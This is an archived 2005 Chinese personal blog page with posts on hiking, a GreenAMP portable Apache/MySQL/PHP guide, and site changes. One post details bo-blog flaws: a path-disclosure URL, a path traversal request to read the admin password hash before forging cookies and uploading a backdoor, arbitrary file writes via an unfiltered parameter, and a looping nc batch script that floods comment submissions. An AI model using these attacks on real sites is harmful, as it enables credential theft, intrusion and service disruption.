按 ‘ 2005年04月 ’ 归档

PP来了

高山水库

凉粉、窄凳及其它

迎春花开呀开

金屋藏娇,看到娇藏在哪儿了么

天池

猜猜哪只鞋是我的^_^

爬山真累

好久没有出去户外运动了,才发现自己的体力是如此不支,爬一趟翠华山下来感觉腿就跟断了似的….[exclaim]
再加上不幸滴又感冒了,整个人都没精神,下山的时候好像随时都会倒下一样。
今天太累了,睡觉先,明天再抽空发几张PP
[lol]

关于bo-blog的安全隐患

bo-blog是一款外观好看,而且当前流行的个人博客系统,在很多下载站你都可以找到这套程序,而且甚至有很多安全界的人都使用着这套php+txt的程序,但是这套程序里有些安全隐患,可能会被人利用去做一些破坏。
首先开门见山,我们说说它的绝对路径暴露问题………
只要提交地址:_blank>http://localhost/blog/index.php?m=2&y=/2005
就可以得到程序所在绝对路径!

这是php中很经常出现的问题!
现在我们在来看一段代码,这是showcat.php里的内容!

if (!file_exists("$dirblog/$cat.php")) {
wronginfo($langerrornocat);
}
unset ($allfiles);
$allfiles=@file("$dirblog/$cat.php");

看到了没有?他直接把cat.php没有处理就拿出来用了,而它又是怎么处理他拿出来的数据的呢?
for ($i=$start; $i<$end;$i++) {
$latest=explode("|",$allfiles[$i]);
$articleid=$latest[1];
$articlename=$latest[2];
$latest[3]=mktimezone($latest[3]);
$showtime=date("Y-n-j",$latest[3]);

这样,它将$cat提交来的文件打开,读出来,但是以|为分隔读出文件内容,因为以|读出文件内容却是从1开始的,所以我们读不出其他的文件,我们只能读文件里有|的文件的第一个|后面的数据。也就是说,假设我们知道用户所在目录的话,我们就可以提交_blank>http://localhost/blog/index.php?job=showcat&cat=../saiy/userid
便可以得到管理员的密码散列。
然后伪造cookies登陆,直接可以传后门了。但是前提是要知道目录名,所以这只限制于目录名了,但是假设对方站点上有其他的php+文本的程序,我们可以利用此文件读出隐秘内容。
我们再来说第二个问题,回复评论未限制时间,大家大概觉得这不算什么问题吧,看完代码不知道你还会这么想吗?
$replyauthor=safe_convert($replyauthor);
$remreplyauthor=$replyauthor;
if ($replyemail!="") $replyauthor.="胃胃".safe_convert($replyemail);
$replycontent=safe_convert($replycontent);
$simplecontent=preg_replace("/[(.+?)]/is", "", $replycontent);
$simplecontent=preg_replace("/<(.+?)>/is", "", $simplecontent);
$simplecontent=preg_replace("/&(.+?);/is", "", $simplecontent);
$curexcerpt=msubstr($simplecontent,0,20);
$timestamp=time();
$areply=@readfromfile("$dirblog/$articleid.rpl");
writetofile("$dirblog/$articleid.rpl",$replycontent."
|rep|
".$areply);
writetofile("$dirblog/list.php",$all1);
updaterenum(1);

看到没有?居然也没对$articleid做过滤,大家觉得吓人吗?哦?你们觉得不怎么样?恐怕不好玩?我改改你再看看。
writetofile("$dirblog/C:winntsystem32hacker.rpl",$replycontent."
|rep|
".$areply);

呼,这样我们把一个垃圾文件写到系统目录下了。要么,写到管理员启动目录?一个N大无比的文本文件。
只要我们不停的提交数据,则不断的把文件写入了,假设你手头没有工具可以帮你提交,我教你个简单的,利用NC的方法!
首先,抓取你发表评论的包,存在NC所在目录下,命名为test.txt。这个大家都会做吧~~
再建立一个bat,命名为test.bat内容为:
nc www.test.com 80 cls
test.bat
呵呵,运行这个.bat文件它就会不停的发送评论了,开两个就是两个线程哦 o(>_<)o

今天是个值得记念滴日子

因为某人说的某句话[arrow]

忙了五天,终于可以好好的放松两天了,明天准备和几个同事一块去爬爬离西安最近的山—-翠华山,期待ing…
不过今晚天早睡了,明天得起得很早[lol]

GreenAMP:可将Apache MySQL PHP安装成绿色软件

为了方便试某人给的那个虾米flashblog,在网上查到了这么个东东…[cry]

下载地址:http://images.blogchina.com/blog/GreenAMP.rar

它不需要安装,下载之后解压到D:GreenAMP目录就可以直接用了,如果是解压到其他的目录请参照下面的文档做一些简单的路径设置。

使用说明(Readme.html,这个文件在压缩包里面有):
[软件版本 / Software Version]
Apache 2.0.50 For Windows
MySQL 4.0.21 For Windows
PHP 5.0.2 For Windows
Smarty 2.6.6
ADOdb 4.5.4 For PHP
phpMyAdmin 2.6.0

[设置方法 / Configuration]
安装到D:GreenAMP
最简单的方法就是直接把压缩包解压到D:GreenAMP目录下面,这样不用做任何设置。然后双击"安装并启动 GreenAMP.bat"就可以正常使用了。

安装到其他目录
如果不是解压到D:GreenAMP目录,就需要修改几个地方,下面假设解压到了C:WAMP,以此为例说明如下:< /p>

Apache
打开C:WAMPApacheconfhttpd.conf
找到第57行,ServerRoot设为"C:/WAMP/Apache",即:ServerRoot "C:/WAMP/Apache"
找到第229行,DocumentRoot设为"C:/WAMP/www",即:DocumentRoot "C:/WAMP/www"

MySQL
打开C:WAMPMySQLmy.ini
找到第2行,basedir=C:/WAMP/MySQL
找到第3行,datadir=C:/WAMP/MySQL/data

PHP
打开C:WAMPPHPphp.ini
找到第508行,extension_dir设为"C:/WAMP/PHP/ext",即:extension_dir = "C:/WAMP/PHP/ext"

设置完毕,双击"安装并启动GreenAMP.bat"就可以正常使用了。
[如何测试 / How to know it does work]
点击这个链接:http://localhost/phpMyAdmin/,在弹出的窗口里面填入用户名root,密码留空,点击确定,如果看到"欢迎使用 phpMyAdmin 2.6.0"的页面则说明Apache、MySQL、PHP和phpMyadmin都已经可以正常工作了。

如果不能成到达那个页面,下面有一些链接,可以帮助您判断GreenAMP的哪些组件已经成功运行:

1.http://localhost

如果能顺利打开这个页面,说明Apache正常工作。

2.http://localhost/phpinfo.php

如果能在此页看到PHP的系统信息,说明PHP和Apache工作正常。

Ext. D:GreenAMPwww est目录是干嘛的?

这是我写的一个简易的快速在本地调试PHP代码片断的页面,打开http://localhost/test/,在输入框里面输入一段想调试的PHP代码,然后点击提交,就可以看到效果了。比如说,我想知道echo能否带括号调用,只需要在输入框中输入echo (&#39Hello Chin!&#39);然后点击提交就可以看到页面上出现"Hello Chin!"的字符串,说明echo是可以带括号调用的。

Ext. Smarty和ADOdb又分别是什么咚咚?

呵呵,知之为知之,不知Google之。Smarty是一个非常优秀的PHP模板引擎(Template Engine),可以很好的实现代码和显示的分离,轻松的实现MVC;ADOdb则是一个类似于微软的ADO的数据库操作组件,可以使得程序员设计 Application的时候不用过多的考虑数据库是什么类型(MySQL还是MS SQL),能实现在不同DBMS之间平滑的迁移而几乎不用修改PHP代码。

[联系我 / Contact]
姓名:覃健祥
地址:北京·海淀区静淑苑路2号创业广场305B
邮编:100083
电话:010-82375391转204
小灵通:010-87452670
网站:chin.blogchina.com
提示:请不要发送Microsoft Office格式的文档给我,用PDF、HTML、TXT代替之,谢谢。

这里还有一些问题解释一下:
1.为什么他们可以做成绿色软件?
其实在Linux下面,大多数软件在安装的时候可以不向系统目录写入文件,不创建文件关联,不创建自启动项目,所以,几乎所有的软件都是绿色软件,而Apache和MySQL是典型的Linux下面的服务器软件,他们的Win32版本也很好继承成了这个优良传统,也是绿色的——事实上, Linux下面那些跨平台的软件莫不如此,他们的Win32版本大多可以做成(或者根本就是)绿色软件,比如Emacs,Amaya,Wget等。PHP 只是Apache的一个模块,Apache成为绿色软件之后,它就更好办啦。能让Apache找到这个模块可以了。

2.既然是绿色软件了,为什么不能解压之后就直接用,而还要点击一下"安装并启动GreenAMP"?
因为我还是建议尝试用GreenAMP的朋友在Win2000/XP/2003的平台上搭建这个环境,因为Win2000/XP/2003都是基于WinNT的,有服务的概念,而Win9X/ME则不具备这个特性。Apache和MySQL做服务有什么好处呢?就是不需要每次用的时候都来启动一次,详细的情况,可以参见我的"自己动手在 Windows下搭建绿色AMP平台",用过MicroWeb的人可能深有体会,呵呵。

而点击"安装并启动GreenAMP"之后,也只是完成了Apache、MySQL服务的安装和启动,没有向系统中添加其他的东西,应该还算是绿色软件吧,^_^
安装并启动GreenAMP.bat文件的内容如下:

cd Apache
cd bin
apache -k install
net start Apache2

cd ..
cd ..
cd mysql
if exist C:Windows copy my.ini C:Windows /y
if exist C:WinNT copy my.ini C:WinNT /y
cd bin
mysqld-nt -install
net start mysql

有兴趣的朋友可以看一下,就是简单的一个批处理文件,仅此而已,^_^

作了些小的修改

今天忙了一天,利用下班时间把这儿作了些小小的修改
1、将表情换成同某jr一样,同时修改blogpost和blogview两个文件中表情排列方式
2、增加了guestbook,为了图快,不厚道的复制了某人的blog_guestbook数据表的结构(神啊,请宽恕我吧….[rolleyes])
3、日历的显示稍作修改(其实就是多加了个<b>-_-!)
4、好像没有了吧,19:30分,嗯,该回家吃饭了[razz]